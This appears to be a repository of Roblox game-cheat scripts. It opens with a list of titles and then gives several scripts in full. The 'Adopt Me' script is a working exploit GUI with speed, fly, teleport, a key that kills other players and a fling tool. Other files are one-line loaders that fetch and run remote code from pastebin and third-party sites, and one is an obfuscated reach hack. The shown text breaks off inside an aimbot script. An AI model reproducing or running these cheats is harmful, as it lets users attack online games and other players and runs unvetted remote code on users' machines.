├── Adopt Me ├── Another JailBreak GUI ├── Another Tower Of Hell ├── Arm Extender ├── Arsenal Best Script ├── Arsenal ESP and AimBot ├── Arsenal Gui V0 ├── Badge Giver ├── Best SkyBlock Scripts ├── Booga Booga ├── Build a boat Farm ├── Build a boat auto ├── Infinite Coins ├── Ip Logger Fake ├── JailBreak Best Script Gui ├── JailBreak Gui 5v5 ├── JaliBreak AutoRob Fixed ├── Kick GUI ├── Lumber Tycoon 2 Best GUI ├── Message GUI ├── Murder Mystery 2 ├── Normal Arsenal GUI ├── Pathom Hub ├── Remote Spy ├── Shinobi Life 2 ├── Size Script ├── Stay alive and flex your time on others ├── Sun God Powers V2 ├── Tower Of Hell ├── Trool GUI ├── Weight Lifting Simulator 3 Gui ├── natural disaster survival ├── natural disaster survival old script ├── press e and everyone dies in arsenal └── shindo life /Adopt Me: -------------------------------------------------------------------------------- 1 | -- Gui to Lua 2 | -- Version: 3 3 | 4 | -- Instances: 5 | 6 | local ScreenGui = Instance.new("ScreenGui") 7 | local RedXGUI = Instance.new("Frame") 8 | local TextLabel = Instance.new("TextLabel") 9 | local TextLabel_2 = Instance.new("TextLabel") 10 | local speed = Instance.new("TextButton") 11 | local gravity = Instance.new("TextButton") 12 | local clickTP = Instance.new("TextButton") 13 | local btools = Instance.new("TextButton") 14 | local autocash = Instance.new("TextButton") 15 | local fling = Instance.new("TextButton") 16 | local fps = Instance.new("TextButton") 17 | local speed_2 = Instance.new("TextButton") 18 | local TextLabel_3 = Instance.new("TextLabel") 19 | local close = Instance.new("TextButton") 20 | local TextLabel_4 = Instance.new("TextLabel") 21 | local open = Instance.new("TextButton") 22 | 23 | --Properties: 24 | 25 | ScreenGui.Parent = game.CoreGui 26 | ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling 27 | 28 | RedXGUI.Name = "RedXGUI" 29 | RedXGUI.Parent = ScreenGui 30 | RedXGUI.BackgroundColor3 = Color3.new(0.666667, 1, 1) 31 | RedXGUI.BorderSizePixel = 4 32 | RedXGUI.Position = UDim2.new(0.465026885, 0, 0.275590599, 0) 33 | RedXGUI.Size = UDim2.new(0, 535, 0, 338) 34 | RedXGUI.Visible = false 35 | RedXGUI.Active = true 36 | RedXGUI.Draggable = true 37 | 38 | TextLabel.Parent = RedXGUI 39 | TextLabel.BackgroundColor3 = Color3.new(0.435294, 0.168627, 0.52549) 40 | TextLabel.BorderColor3 = Color3.new(0, 0, 0) 41 | TextLabel.BorderSizePixel = 3 42 | TextLabel.Position = UDim2.new(0.0200752541, 0, -0.0384615362, 0) 43 | TextLabel.Size = UDim2.new(0, 200, 0, 50) 44 | TextLabel.Font = Enum.Font.SourceSans 45 | TextLabel.Text = "REDX ADOPTME- TURNINGGLOBE" 46 | TextLabel.TextColor3 = Color3.new(0, 0, 0) 47 | TextLabel.TextSize = 14 48 | 49 | TextLabel_2.Parent = RedXGUI 50 | TextLabel_2.BackgroundColor3 = Color3.new(0.262745, 0.0666667, 0.435294) 51 | TextLabel_2.BorderColor3 = Color3.new(0, 0, 0) 52 | TextLabel_2.BorderSizePixel = 3 53 | TextLabel_2.Position = UDim2.new(-0.287850469, 0, 0.514792919, 0) 54 | TextLabel_2.Rotation = 90 55 | TextLabel_2.Size = UDim2.new(0, 289, 0, 11) 56 | TextLabel_2.Font = Enum.Font.SourceSans 57 | TextLabel_2.Text = "" 58 | TextLabel_2.TextColor3 = Color3.new(0, 0, 0) 59 | TextLabel_2.TextSize = 14 60 | 61 | speed.Name = "speed" 62 | speed.Parent = RedXGUI 63 | speed.BackgroundColor3 = Color3.new(0.666667, 0, 0) 64 | speed.BackgroundTransparency = 0.5 65 | speed.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 66 | speed.BorderSizePixel = 3 67 | speed.Position = UDim2.new(0.0186915882, 0, 0.189349115, 0) 68 | speed.Size = UDim2.new(0, 137, 0, 31) 69 | speed.Font = Enum.Font.Gotham 70 | speed.Text = "SPEED[X]" 71 | speed.TextColor3 = Color3.new(0, 0, 0) 72 | speed.TextScaled = true 73 | speed.TextSize = 14 74 | speed.TextWrapped = true 75 | speed.MouseButton1Down:connect(function() 76 | local walkspeedplayer = game:GetService("Players").LocalPlayer 77 | local walkspeedmouse = walkspeedplayer:GetMouse() 78 | 79 | local walkspeedenabled = false 80 | 81 | function x_walkspeed(key) 82 | if (key == "x") then 83 | if walkspeedenabled == false then 84 | _G.WS = 200; 85 | local Humanoid = game:GetService("Players").LocalPlayer.Character.Humanoid; 86 | Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function() 87 | Humanoid.WalkSpeed = _G.WS; 88 | end) 89 | Humanoid.WalkSpeed = _G.WS; 90 | 91 | walkspeedenabled = true 92 | elseif walkspeedenabled == true then 93 | _G.WS = 20; 94 | local Humanoid = game:GetService("Players").LocalPlayer.Character.Humanoid; 95 | Humanoid:GetPropertyChangedSignal("WalkSpeed"):Connect(function() 96 | Humanoid.WalkSpeed = _G.WS; 97 | end) 98 | Humanoid.WalkSpeed = _G.WS; 99 | 100 | walkspeedenabled = false 101 | end 102 | end 103 | end 104 | 105 | walkspeedmouse.KeyDown:connect(x_walkspeed) 106 | 107 | end) 108 | 109 | gravity.Name = "gravity" 110 | gravity.Parent = RedXGUI 111 | gravity.BackgroundColor3 = Color3.new(0.666667, 0, 0) 112 | gravity.BackgroundTransparency = 0.5 113 | gravity.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 114 | gravity.BorderSizePixel = 3 115 | gravity.Position = UDim2.new(0.355140209, 0, 0.189349115, 0) 116 | gravity.Size = UDim2.new(0, 137, 0, 31) 117 | gravity.Font = Enum.Font.Gotham 118 | gravity.Text = "GRAVITY" 119 | gravity.TextColor3 = Color3.new(0, 0, 0) 120 | gravity.TextScaled = true 121 | gravity.TextSize = 14 122 | gravity.TextWrapped = true 123 | gravity.MouseButton1Down:connect(function() 124 | if Gravity == true then 125 | Gravity = false 126 | game.workspace.Gravity = 196.2 127 | else 128 | Gravity = true 129 | game.workspace.Gravity = 45 130 | end 131 | end) 132 | 133 | clickTP.Name = "clickTP" 134 | clickTP.Parent = RedXGUI 135 | clickTP.BackgroundColor3 = Color3.new(0.666667, 0, 0) 136 | clickTP.BackgroundTransparency = 0.5 137 | clickTP.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 138 | clickTP.BorderSizePixel = 3 139 | clickTP.Position = UDim2.new(0.693457961, 0, 0.189349115, 0) 140 | clickTP.Size = UDim2.new(0, 137, 0, 31) 141 | clickTP.Font = Enum.Font.Gotham 142 | clickTP.Text = "CLICKTP[N]" 143 | clickTP.TextColor3 = Color3.new(0, 0, 0) 144 | clickTP.TextScaled = true 145 | clickTP.TextSize = 14 146 | clickTP.TextWrapped = true 147 | clickTP.MouseButton1Click:Connect(function() 148 | toggle = true 149 | togglekey = "n" --Key that you will use to toggle the on and off 150 | killkey = "k" --Key that you will use to kill a player 151 | function Hint(txt) 152 | local b = Instance.new('Hint', workspace) 153 | b.Text = txt 154 | wait(2) 155 | b:Destroy() 156 | end 157 | Local = game:GetService('Players').LocalPlayer 158 | Mouse = Local:GetMouse() 159 | Mouse.Button1Down:connect(function() 160 | pcall(function() 161 | if toggle then 162 | Local.Character.HumanoidRootPart.CFrame = Local:GetMouse().Hit 163 | end 164 | end) 165 | end) 166 | Mouse.KeyDown:connect(function(key) 167 | if key == togglekey then 168 | if toggle then 169 | toggle = false 170 | Hint('Turned Off!') 171 | print ('Turned Off!') 172 | else 173 | toggle = true 174 | Hint('Turned On!') 175 | print ('Turned On!') 176 | end 177 | elseif key == killkey then 178 | if toggle then 179 | pcall(function() 180 | Mouse.Target.Parent:FindFirstChild('Humanoid').Health = 0 181 | Hint('Killed ' .. Mouse.Target.Parent.Name) 182 | end) 183 | end 184 | end 185 | end) 186 | end) 187 | 188 | btools.Name = "btools" 189 | btools.Parent = RedXGUI 190 | btools.BackgroundColor3 = Color3.new(0.666667, 0, 0) 191 | btools.BackgroundTransparency = 0.5 192 | btools.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 193 | btools.BorderSizePixel = 3 194 | btools.Position = UDim2.new(0.0186915882, 0, 0.423076928, 0) 195 | btools.Size = UDim2.new(0, 137, 0, 31) 196 | btools.Font = Enum.Font.Gotham 197 | btools.Text = "BTOOLS" 198 | btools.TextColor3 = Color3.new(0, 0, 0) 199 | btools.TextScaled = true 200 | btools.TextSize = 14 201 | btools.TextWrapped = true 202 | btools.MouseButton1Down:connect(function() 203 | game.StarterGui:SetCoreGuiEnabled(Enum.CoreGuiType.Backpack, true) 204 | for index, child in pairs(game:GetService("Workspace"):GetChildren()) do 205 | if child.ClassName == "Part" then 206 | child.Locked = false 207 | end 208 | if child.ClassName == "MeshPart" then 209 | child.Locked = false 210 | end 211 | if child.ClassName == "UnionOperation" then 212 | child.Locked = false 213 | end 214 | if child.ClassName == "Model" then 215 | for index, chil in pairs(child:GetChildren()) do 216 | if chil.ClassName == "Part" then 217 | chil.Locked = false 218 | end 219 | if chil.ClassName == "MeshPart" then 220 | chil.Locked = false 221 | end 222 | if chil.ClassName == "UnionOperation" then 223 | chil.Locked = false 224 | end 225 | if chil.ClassName == "Model" then 226 | for index, childe in pairs(chil:GetChildren()) do 227 | if childe.ClassName == "Part" then 228 | childe.Locked = false 229 | end 230 | if childe.ClassName == "MeshPart" then 231 | childe.Locked = false 232 | end 233 | if childe.ClassName == "UnionOperation" then 234 | childe.Locked = false 235 | end 236 | if childe.ClassName == "Model" then 237 | for index, childeo in pairs(childe:GetChildren()) do 238 | if childeo.ClassName == "Part" then 239 | childeo.Locked = false 240 | end 241 | if childeo.ClassName == "MeshPart" then 242 | childeo.Locked = false 243 | end 244 | if childeo.ClassName == "UnionOperation" then 245 | childeo.Locked = false 246 | end 247 | if childeo.ClassName == "Model" then 248 | end 249 | end 250 | end 251 | end 252 | end 253 | end 254 | end 255 | end 256 | c = Instance.new("HopperBin", game:GetService("Players").LocalPlayer.Backpack) 257 | c.BinType = Enum.BinType.Hammer 258 | c = Instance.new("HopperBin", game:GetService("Players").LocalPlayer.Backpack) 259 | c.BinType = Enum.BinType.Clone 260 | c = Instance.new("HopperBin", game:GetService("Players").LocalPlayer.Backpack) 261 | c.BinType = Enum.BinType.Grab 262 | end) 263 | 264 | autocash.Name = "autocash" 265 | autocash.Parent = RedXGUI 266 | autocash.BackgroundColor3 = Color3.new(0.666667, 0, 0) 267 | autocash.BackgroundTransparency = 0.5 268 | autocash.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 269 | autocash.BorderSizePixel = 3 270 | autocash.Position = UDim2.new(0.355140209, 0, 0.423076928, 0) 271 | autocash.Size = UDim2.new(0, 137, 0, 31) 272 | autocash.Font = Enum.Font.Gotham 273 | autocash.Text = "AUTOCASH" 274 | autocash.TextColor3 = Color3.new(0, 0, 0) 275 | autocash.TextScaled = true 276 | autocash.TextSize = 14 277 | autocash.TextWrapped = true 278 | 279 | fling.Name = "fling" 280 | fling.Parent = RedXGUI 281 | fling.BackgroundColor3 = Color3.new(0.666667, 0, 0) 282 | fling.BackgroundTransparency = 0.5 283 | fling.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 284 | fling.BorderSizePixel = 3 285 | fling.Position = UDim2.new(0.693457961, 0, 0.423076928, 0) 286 | fling.Size = UDim2.new(0, 137, 0, 31) 287 | fling.Font = Enum.Font.Gotham 288 | fling.Text = "FLINGGUI" 289 | fling.TextColor3 = Color3.new(0, 0, 0) 290 | fling.TextScaled = true 291 | fling.TextSize = 14 292 | fling.TextWrapped = true 293 | fling.MouseButton1Click:Connect(function() 294 | -- Made By JackMcJagger15 295 | local FlingKill = Instance.new("ScreenGui") 296 | local Main = Instance.new("Frame") 297 | local Label = Instance.new("Frame") 298 | local Shadow = Instance.new("Frame") 299 | local StartKill = Instance.new("TextButton") 300 | local StopKill = Instance.new("TextButton") 301 | local Instructions = Instance.new("TextLabel") 302 | local CurrentPower = Instance.new("TextLabel") 303 | local Recomendation = Instance.new("TextLabel") 304 | local NameOfGui = Instance.new("TextLabel") 305 | local Exit = Instance.new("TextButton") 306 | local UPArrow = Instance.new("TextButton") 307 | local DownArrow = Instance.new("TextButton") 308 | 309 | -- Properties 310 | 311 | FlingKill.Name = "Fling/Kill" 312 | FlingKill.Parent = game.CoreGui 313 | 314 | Main.Name = "Main" 315 | Main.Parent = FlingKill 316 | Main.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) 317 | Main.BorderSizePixel = 0 318 | Main.Position = UDim2.new(0.702554762, 0, 0.446640313, 0) 319 | Main.Size = UDim2.new(0, 217, 0, 233) 320 | Main.Selectable = true 321 | Main.Active = true 322 | Main.Draggable = true 323 | 324 | Label.Name = "Label" 325 | Label.Parent = Main 326 | Label.BackgroundColor3 = Color3.new(0.741176, 0.764706, 0.780392) 327 | Label.BorderSizePixel = 0 328 | Label.Size = UDim2.new(0, 217, 0, 27) 329 | 330 | Shadow.Name = "Shadow" 331 | Shadow.Parent = Main 332 | Shadow.BackgroundColor3 = Color3.new(0.67451, 0.694118, 0.705882) 333 | Shadow.BorderSizePixel = 0 334 | Shadow.Position = UDim2.new(0, 0, 0.115879826, 0) 335 | Shadow.Size = UDim2.new(0, 217, 0, 9) 336 | 337 | StartKill.Name = "StartKill" 338 | StartKill.Parent = Main 339 | StartKill.BackgroundColor3 = Color3.new(0.741176, 0.764706, 0.780392) 340 | StartKill.BorderSizePixel = 0 341 | StartKill.Position = UDim2.new(0.195852548, 0, 0.227467805, 0) 342 | StartKill.Size = UDim2.new(0, 126, 0, 23) 343 | StartKill.Font = Enum.Font.Cartoon 344 | StartKill.Text = "FE Kill/Fling" 345 | StartKill.TextColor3 = Color3.new(0, 0, 0) 346 | StartKill.TextSize = 14 347 | 348 | StopKill.Name = "StopKill" 349 | StopKill.Parent = Main 350 | StopKill.BackgroundColor3 = Color3.new(0.741176, 0.764706, 0.780392) 351 | StopKill.BorderSizePixel = 0 352 | StopKill.Position = UDim2.new(0.207373276, 0, 0.38197428, 0) 353 | StopKill.Size = UDim2.new(0, 124, 0, 23) 354 | StopKill.Font = Enum.Font.Cartoon 355 | StopKill.Text = "Stop FE Kill/Fling" 356 | StopKill.TextColor3 = Color3.new(0, 0, 0) 357 | StopKill.TextSize = 14 358 | 359 | Instructions.Name = "Instructions" 360 | Instructions.Parent = Main 361 | Instructions.BackgroundColor3 = Color3.new(1, 1, 1) 362 | Instructions.BackgroundTransparency = 1 363 | Instructions.Position = UDim2.new(0.0391705073, 0, 0.549356222, 0) 364 | Instructions.Size = UDim2.new(0, 200, 0, 32) 365 | Instructions.Font = Enum.Font.Cartoon 366 | Instructions.Text = "Just touch someone to watch the fly to their death!" 367 | Instructions.TextColor3 = Color3.new(0, 0, 0) 368 | Instructions.TextSize = 14 369 | Instructions.TextWrapped = true 370 | 371 | CurrentPower.Name = "CurrentPower" 372 | CurrentPower.Parent = Main 373 | CurrentPower.BackgroundColor3 = Color3.new(1, 1, 1) 374 | CurrentPower.BackgroundTransparency = 1 375 | CurrentPower.Position = UDim2.new(0.276497692, 0, 0.686695278, 0) 376 | CurrentPower.Size = UDim2.new(0, 98, 0, 36) 377 | CurrentPower.Font = Enum.Font.Cartoon 378 | CurrentPower.Text = "Current Power = 5" 379 | CurrentPower.TextColor3 = Color3.new(0, 0, 0) 380 | CurrentPower.TextSize = 14 381 | 382 | Recomendation.Name = "Recomendation" 383 | Recomendation.Parent = Main 384 | Recomendation.BackgroundColor3 = Color3.new(1, 1, 1) 385 | Recomendation.BackgroundTransparency = 1 386 | Recomendation.Position = UDim2.new(0.0414746553, 0, 0.884120166, 0) 387 | Recomendation.Size = UDim2.new(0, 200, 0, 21) 388 | Recomendation.Font = Enum.Font.Cartoon 389 | Recomendation.Text = "Recommended Power is 5" 390 | Recomendation.TextColor3 = Color3.new(0, 0, 0) 391 | Recomendation.TextSize = 14 392 | 393 | NameOfGui.Name = "NameOfGui" 394 | NameOfGui.Parent = Main 395 | NameOfGui.BackgroundColor3 = Color3.new(1, 1, 1) 396 | NameOfGui.BackgroundTransparency = 1 397 | NameOfGui.Position = UDim2.new(0.0806451589, 0, 0, 0) 398 | NameOfGui.Size = UDim2.new(0, 154, 0, 27) 399 | NameOfGui.Font = Enum.Font.Cartoon 400 | NameOfGui.Text = "FE Kill/Fling By JackMcJagger15" 401 | NameOfGui.TextColor3 = Color3.new(0, 0, 0) 402 | NameOfGui.TextSize = 14 403 | 404 | Exit.Name = "Exit" 405 | Exit.Parent = Main 406 | Exit.BackgroundColor3 = Color3.new(1, 1, 1) 407 | Exit.BackgroundTransparency = 1 408 | Exit.Position = UDim2.new(0.907834113, 0, 0, 0) 409 | Exit.Size = UDim2.new(0, 20, 0, 27) 410 | Exit.Font = Enum.Font.Cartoon 411 | Exit.Text = "X" 412 | Exit.TextColor3 = Color3.new(0, 0, 0) 413 | Exit.TextSize = 14 414 | 415 | UPArrow.Name = "UPArrow" 416 | UPArrow.Parent = Main 417 | UPArrow.BackgroundColor3 = Color3.new(1, 1, 1) 418 | UPArrow.BackgroundTransparency = 1 419 | UPArrow.Position = UDim2.new(0.0783410147, 0, 0.716738224, 0) 420 | UPArrow.Size = UDim2.new(0, 26, 0, 23) 421 | UPArrow.Font = Enum.Font.Cartoon 422 | UPArrow.Text = "Up" 423 | UPArrow.TextColor3 = Color3.new(0, 0, 0) 424 | UPArrow.TextSize = 12 425 | UPArrow.TextWrapped = true 426 | 427 | DownArrow.Name = "DownArrow" 428 | DownArrow.Parent = Main 429 | DownArrow.BackgroundColor3 = Color3.new(1, 1, 1) 430 | DownArrow.BackgroundTransparency = 1 431 | DownArrow.Position = UDim2.new(0.792626739, 0, 0.714592278, 0) 432 | DownArrow.Size = UDim2.new(0, 26, 0, 23) 433 | DownArrow.Font = Enum.Font.Cartoon 434 | DownArrow.Text = "Down" 435 | DownArrow.TextColor3 = Color3.new(0, 0, 0) 436 | DownArrow.TextSize = 12 437 | DownArrow.TextWrapped = true 438 | 439 | power = 500 440 | active = false 441 | local val = Instance.new("IntValue") 442 | val.Name = "Number" 443 | val.Parent = game.Players.LocalPlayer 444 | val.Value = 5 445 | 446 | Exit.MouseButton1Click:connect(function() 447 | FlingKill.Enabled = false 448 | end) 449 | 450 | StartKill.MouseButton1Click:connect(function() 451 | game:GetService('RunService').Stepped:connect(function() 452 | if game.Players.LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then 453 | game.Players.LocalPlayer.Character.Head.CanCollide = false 454 | game.Players.LocalPlayer.Character.Torso.CanCollide = false 455 | game.Players.LocalPlayer.Character["Left Leg"].CanCollide = false 456 | game.Players.LocalPlayer.Character["Right Leg"].CanCollide = false 457 | else 458 | if game.Players.LocalPlayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R15 then 459 | game.Players.LocalPlayer.Character.Head.CanCollide = false 460 | game.Players.LocalPlayer.Character.UpperTorso.CanCollide = false 461 | game.Players.LocalPlayer.Character.LowerTorso.CanCollide = false 462 | game.Players.LocalPlayer.Character.HumanoidRootPart.CanCollide = false 463 | end 464 | end 465 | end) 466 | wait(.1) 467 | local bambam = Instance.new("BodyThrust") 468 | bambam.Parent = game.Players.LocalPlayer.Character.HumanoidRootPart 469 | bambam.Force = Vector3.new(power,0,power) 470 | bambam.Location = game.Players.LocalPlayer.Character.HumanoidRootPart.Position 471 | end) 472 | 473 | StopKill.MouseButton1Click:connect(function() 474 | active = false 475 | game.Players.LocalPlayer.Character.HumanoidRootPart.BodyThrust:Remove() 476 | end) 477 | 478 | UPArrow.MouseButton1Click:connect(function() 479 | power = power + 100 480 | game.Players.LocalPlayer.Number.Value = game.Players.LocalPlayer.Number.Value + 1 481 | CurrentPower.Text = "Current Power = " .. game.Players.LocalPlayer.Number.Value 482 | end) 483 | 484 | DownArrow.MouseButton1Click:connect(function() 485 | power = power - 100 486 | game.Players.LocalPlayer.Number.Value = game.Players.LocalPlayer.Number.Value - 1 487 | CurrentPower.Text = "Current Power = " .. game.Players.LocalPlayer.Number.Value 488 | end) 489 | end) 490 | 491 | fps.Name = "fps" 492 | fps.Parent = RedXGUI 493 | fps.BackgroundColor3 = Color3.new(0.666667, 0, 0) 494 | fps.BackgroundTransparency = 0.5 495 | fps.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 496 | fps.BorderSizePixel = 3 497 | fps.Position = UDim2.new(0.0186915882, 0, 0.636094689, 0) 498 | fps.Size = UDim2.new(0, 137, 0, 31) 499 | fps.Font = Enum.Font.SourceSans 500 | fps.Text = "FPSBOOSTER" 501 | fps.TextColor3 = Color3.new(0, 0, 0) 502 | fps.TextScaled = true 503 | fps.TextSize = 14 504 | fps.TextWrapped = true 505 | fps.MouseButton1Click:Connect(function() 506 | for _,v in pairs(workspace:GetDescendants()) do 507 | if v.ClassName == "Part" 508 | or v.ClassName == "SpawnLocation" 509 | or v.ClassName == "WedgePart" 510 | or v.ClassName == "Terrain" 511 | or v.ClassName == "MeshPart" then 512 | v.Material = "Plastic" 513 | end 514 | end 515 | 516 | for _,v in pairs(workspace:GetDescendants()) do 517 | if v.ClassName == "Decal" 518 | or v.ClassName == "Texture" then 519 | v:Destroy() 520 | end 521 | end 522 | end) 523 | 524 | speed_2.Name = "speed" 525 | speed_2.Parent = RedXGUI 526 | speed_2.BackgroundColor3 = Color3.new(0.666667, 0, 0) 527 | speed_2.BackgroundTransparency = 0.5 528 | speed_2.BorderColor3 = Color3.new(0.258824, 0.0901961, 0.4) 529 | speed_2.BorderSizePixel = 3 530 | speed_2.Position = UDim2.new(0.355140179, 0, 0.636094689, 0) 531 | speed_2.Size = UDim2.new(0, 318, 0, 31) 532 | speed_2.Font = Enum.Font.Gotham 533 | speed_2.Text = "FLY[Q]" 534 | speed_2.TextColor3 = Color3.new(0, 0, 0) 535 | speed_2.TextScaled = true 536 | speed_2.TextSize = 14 537 | speed_2.TextWrapped = true 538 | speed_2.MouseButton1Down:connect(function() 539 | local Enabled = false 540 | local Camera = game.Workspace.CurrentCamera 541 | local Player = game:GetService("Players").LocalPlayer 542 | local Input = game:GetService("UserInputService") 543 | local Forward = false 544 | local Back = false 545 | local Left = false 546 | local Right = false 547 | local Up = false 548 | local Down = false 549 | 550 | local function SetPlayer() 551 | for i,v in pairs(Player.Character:GetChildren()) do 552 | pcall(function() 553 | v.Anchored = not v.Anchored 554 | end) 555 | end 556 | end 557 | 558 | Input.InputBegan:Connect(function(Key,IsChat) 559 | if IsChat then return end 560 | if Key.KeyCode == Enum.KeyCode.Q then 561 | Enabled = not Enabled 562 | SetPlayer() 563 | end 564 | if Key.KeyCode == Enum.KeyCode.W then 565 | Forward = true 566 | end 567 | if Key.KeyCode == Enum.KeyCode.S then 568 | Back = true 569 | end 570 | if Key.KeyCode == Enum.KeyCode.A then 571 | Left = true 572 | end 573 | if Key.KeyCode == Enum.KeyCode.D then 574 | Right = true 575 | end 576 | if Key.KeyCode == Enum.KeyCode.Space then 577 | Up = true 578 | end 579 | if Key.KeyCode == Enum.KeyCode.LeftControl then 580 | Down = true 581 | end 582 | end) 583 | 584 | Input.InputEnded:Connect(function(Key,IsChat) 585 | if IsChat then return end 586 | if Key.KeyCode == Enum.KeyCode.W then 587 | Forward = false 588 | end 589 | if Key.KeyCode == Enum.KeyCode.S then 590 | Back = false 591 | end 592 | if Key.KeyCode == Enum.KeyCode.A then 593 | Left = false 594 | end 595 | if Key.KeyCode == Enum.KeyCode.D then 596 | Right = false 597 | end 598 | if Key.KeyCode == Enum.KeyCode.Space then 599 | Up = false 600 | end 601 | if Key.KeyCode == Enum.KeyCode.LeftControl then 602 | Down = false 603 | end 604 | end) 605 | 606 | while game:GetService("RunService").RenderStepped:Wait() do 607 | if Enabled then 608 | pcall(function() 609 | if Forward then 610 | Player.Character:TranslateBy(Camera.CFrame.lookVector*2) 611 | end 612 | if Back then 613 | Player.Character:TranslateBy(-Camera.CFrame.lookVector*2) 614 | end 615 | if Left then 616 | Player.Character:TranslateBy(-Camera.CFrame:vectorToWorldSpace(Vector3.new(1,0,0))*2) 617 | end 618 | if Right then 619 | Player.Character:TranslateBy(Camera.CFrame:vectorToWorldSpace(Vector3.new(1,0,0))*2) 620 | end 621 | if Up then 622 | Player.Character:TranslateBy(Camera.CFrame:vectorToWorldSpace(Vector3.new(0,1,0))*2) 623 | end 624 | if Down then 625 | Player.Character:TranslateBy(-Camera.CFrame:vectorToWorldSpace(Vector3.new(0,1,0))*2) 626 | end 627 | end) 628 | end 629 | end 630 | end) 631 | 632 | TextLabel_3.Parent = RedXGUI 633 | TextLabel_3.BackgroundColor3 = Color3.new(0.317647, 0.156863, 0.458824) 634 | TextLabel_3.BorderSizePixel = 3 635 | TextLabel_3.Position = UDim2.new(0.0672897175, 0, 0.547337294, 0) 636 | TextLabel_3.Rotation = 90 637 | TextLabel_3.Size = UDim2.new(0, 261, 0, 6) 638 | TextLabel_3.Font = Enum.Font.SourceSans 639 | TextLabel_3.Text = "" 640 | TextLabel_3.TextColor3 = Color3.new(0, 0, 0) 641 | TextLabel_3.TextSize = 14 642 | 643 | close.Name = "close" 644 | close.Parent = RedXGUI 645 | close.BackgroundColor3 = Color3.new(0.34902, 0, 0.52549) 646 | close.BorderSizePixel = 3 647 | close.Position = UDim2.new(0.893457949, 0, 0.0384615399, 0) 648 | close.Size = UDim2.new(0, 30, 0, 24) 649 | close.Font = Enum.Font.SourceSans 650 | close.Text = "X" 651 | close.TextColor3 = Color3.new(0, 0, 0) 652 | close.TextScaled = true 653 | close.TextSize = 14 654 | close.TextWrapped = true 655 | close.MouseButton1Down:connect(function() 656 | RedXGUI.Visible = false 657 | open.Visible = true 658 | end) 659 | 660 | TextLabel_4.Parent = RedXGUI 661 | TextLabel_4.BackgroundColor3 = Color3.new(1, 1, 1) 662 | TextLabel_4.BackgroundTransparency = 1 663 | TextLabel_4.Position = UDim2.new(0.428359777, 0, 0.794960082, 0) 664 | TextLabel_4.Size = UDim2.new(0, 245, 0, 55) 665 | TextLabel_4.Font = Enum.Font.Gotham 666 | TextLabel_4.Text = "SUBSCRIBE TO TURNINGLOBERB ON YOUTUBE" 667 | TextLabel_4.TextColor3 = Color3.new(0, 0, 0) 668 | TextLabel_4.TextScaled = true 669 | TextLabel_4.TextSize = 14 670 | TextLabel_4.TextWrapped = true 671 | 672 | open.Name = "open" 673 | open.Parent = ScreenGui 674 | open.BackgroundColor3 = Color3.new(0.666667, 1, 1) 675 | open.BorderSizePixel = 3 676 | open.Position = UDim2.new(0.00538047682, 0, 0.412598431, 0) 677 | open.Size = UDim2.new(0, 75, 0, 31) 678 | open.Font = Enum.Font.Gotham 679 | open.Text = "OPEN" 680 | open.TextColor3 = Color3.new(0, 0, 0) 681 | open.TextScaled = true 682 | open.TextSize = 14 683 | open.TextWrapped = true 684 | open.MouseButton1Down:connect(function() 685 | RedXGUI.Visible = true 686 | open.Visible = false 687 | end) 688 | -------------------------------------------------------------------------------- /Another JailBreak GUI: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet(("https://fluxteam.xyz/scripts/fluxbreak/fluxbreak.lua"), true))() 2 | -------------------------------------------------------------------------------- /Another Tower Of Hell: -------------------------------------------------------------------------------- 1 | loadstring(game:GetObjects("rbxassetid://3473939051")[1].Source)() 2 | -------------------------------------------------------------------------------- /Arm Extender: -------------------------------------------------------------------------------- 1 | DFSDSFDSFDFDSSFDDGFDSAFADS=game.Players.LocalPlayer.Character 2 | local FDSFDLSDKFKLDSLKFSDKLDSFLFDSKSASA=DFSDSFDSFDFDSSFDDGFDSAFADS.Torso["Right Shoulder"]DSADSDAASDSADSDASADSADSADSDASADDSAASDASD=1.35 -- moves arm up and down 3 | DFGFLDSFKDLFKLFDSLKSDFLKFDSLKFDSKLFDSLKFSDLKFDSLKFSDKFDS=-0 4 | DHGJHLHJHHJLJLHLJHJLJJLJLHJLHJLHLHHLLHGL=-8 -- REACH 5 | XKKKKGFKDFKFDKSFKDSKFKDSDLGSDLFDONAMTLRUMPFDSFKSLFS=90 FDSFDLSDKFKLDSLKFSDKLDSFLFDSKSASA.C0=CFrame.new(DSADSDAASDSADSDASADSADSADSDASADDSAASDASD,DFGFLDSFKDLFKLFDSLKSDFLKFDSLKFDSKLFDSLKFSDLKFDSLKFSDKFDS,DHGJHLHJHHJLJLHLJHJLJJLJLHJLHJLHLHHLLHGL)*CFrame.Angles(math.rad(0),math.rad(XKKKKGFKDFKFDKSFKDSKFKDSDLGSDLFDONAMTLRUMPFDSFKSLFS),math.rad(0)) 6 | -------------------------------------------------------------------------------- /Arsenal Best Script: -------------------------------------------------------------------------------- 1 | loadstring(game:HttpGet('https://pastebin.com/raw/T3fzg7tm', true))() 2 | -------------------------------------------------------------------------------- /Arsenal ESP and AimBot: -------------------------------------------------------------------------------- 1 | local Keylime = loadstring(game:HttpGet('https://strazos.xyz/files/6f3a77d335f20fc86c2e89ff.txt'))() 2 | loadstring(game:HttpGet('https://strazos.xyz/files/2f2dc012e71896f1a2313cd7.lua'))() 3 | wait(10) 4 | pcall(function() 5 | loadstring(game:HttpGet('https://strazos.xyz/files/86a645afd7877318a03df885.txt', true))() 6 | end) 7 | 8 | -- Treacherous Tower 9 | if game.GameId == 1383164929 then 10 | local Library = Keylime.new("Treacherous Tower") 11 | Library:Create("Toggle", "God Mode", function(thing) 12 | godmode = thing 13 | end, {Default = false}) 14 | Library:Create("Toggle", "Inf Jump", function(thing) 15 | Jump = thing 16 | end, {Default = false}) 17 | Library:Create("Slider", "Walkspeed", function(thing) 18 | game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = thing 19 | end, {Default = 16, MinValue = 16, MaxValue = 100}) 20 | 